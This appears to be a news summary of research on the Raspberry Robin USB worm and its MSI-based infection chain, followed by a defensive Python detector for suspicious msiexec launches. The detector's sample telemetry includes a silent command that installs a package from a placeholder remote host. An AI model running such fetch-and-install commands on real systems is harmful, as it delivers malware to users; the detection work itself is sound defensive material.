The Raspberry Robin worm has been used in attacks against telecommunications and government office systems across Latin America, Australia, and Europe since at least September 2022.
“The main payload itself is packed with more than 10 layers for obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools,” Trend Micro researcher Christopher So said in a technical analysis published Tuesday.
A majority of the infections have been detected in Argentina, followed by Australia, Mexico, Croatia, Italy, Brazil, France, India, and Colombia.
Raspberry Robin, attributed to an activity cluster tracked by Microsoft as DEV-0856, is being increasingly leveraged by multiple threat actors as an initial access mechanism to deliver payloads such as LockBit and Clop ransomware.
The malware is known for relying on infected USB drives as a distribution vector: the drive's contents lead the victim's machine to download a rogue MSI installer file, which in turn deploys the main payload responsible for post-exploitation activity.
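The infection chain above (removable media leading to an MSI download) suggests a simple process-creation check a defender can run over endpoint telemetry. The example below is added here and is not code from Trend Micro, Microsoft, or the Hacker News write-up; the pipe-delimited event layout, the `parent_drive_type` field, and the sample lines are all constructed assumptions standing in for a real EDR or Sysmon export.

```python
# Added detection example; not from the Raspberry Robin analysis or from any
# vendor. Flags msiexec.exe invocations that pull a package from a remote URL
# or that are launched from a process living on removable media.
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str
    parent_drive_type: str  # constructed field: "fixed" or "removable"


# Matches an http/https package source on the msiexec command line.
REMOTE_URL_RE = re.compile(r"(?i)https?://\S+")


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed event line: parent|image|drive_type|cmdline."""
    parent, image, drive_type, cmdline = line.split("|", 3)
    return ProcessEvent(
        parent_image=parent.strip(),
        image=image.strip(),
        command_line=cmdline.strip(),
        parent_drive_type=drive_type.strip().lower(),
    )


def suspicious_reasons(ev: ProcessEvent) -> list[str]:
    """Return the heuristic hits for one event (empty list means benign)."""
    reasons: list[str] = []
    if not ev.image.lower().endswith("msiexec.exe"):
        return reasons
    if REMOTE_URL_RE.search(ev.command_line):
        reasons.append("msiexec with remote package URL")
    if ev.parent_drive_type == "removable":
        reasons.append("msiexec launched from removable media")
    return reasons


def scan(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Return (command_line, reasons) for every flagged event."""
    flagged = []
    for line in lines:
        ev = parse_event(line)
        reasons = suspicious_reasons(ev)
        if reasons:
            flagged.append((ev.command_line, reasons))
    return flagged


# Constructed sample telemetry; hostnames and paths are placeholders.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\msiexec.exe|removable|"
    r"msiexec /q /i http://example.invalid/pkg",
    r"C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|fixed|"
    r"msiexec /i https://example.invalid/update.msi",
    r"E:\run.exe|C:\Windows\System32\msiexec.exe|removable|"
    r"msiexec /i E:\setup.msi",
    r"C:\Windows\explorer.exe|C:\Windows\System32\msiexec.exe|fixed|"
    r"msiexec /i C:\Users\user\Downloads\setup.msi",
    r"C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|removable|"
    r"notepad E:\notes.txt",
]

if __name__ == "__main__":
    for cmdline, reasons in scan(SAMPLE_EVENTS):
        print(f"FLAG: {cmdline}\n      {'; '.join(reasons)}")
```

The remote-URL rule is the stronger signal: installers launched by normal software deployment rarely hand msiexec an http source, whereas the removable-media rule will fire on legitimate USB-delivered installers and should be tuned or paired with the first rule in environments where that is common.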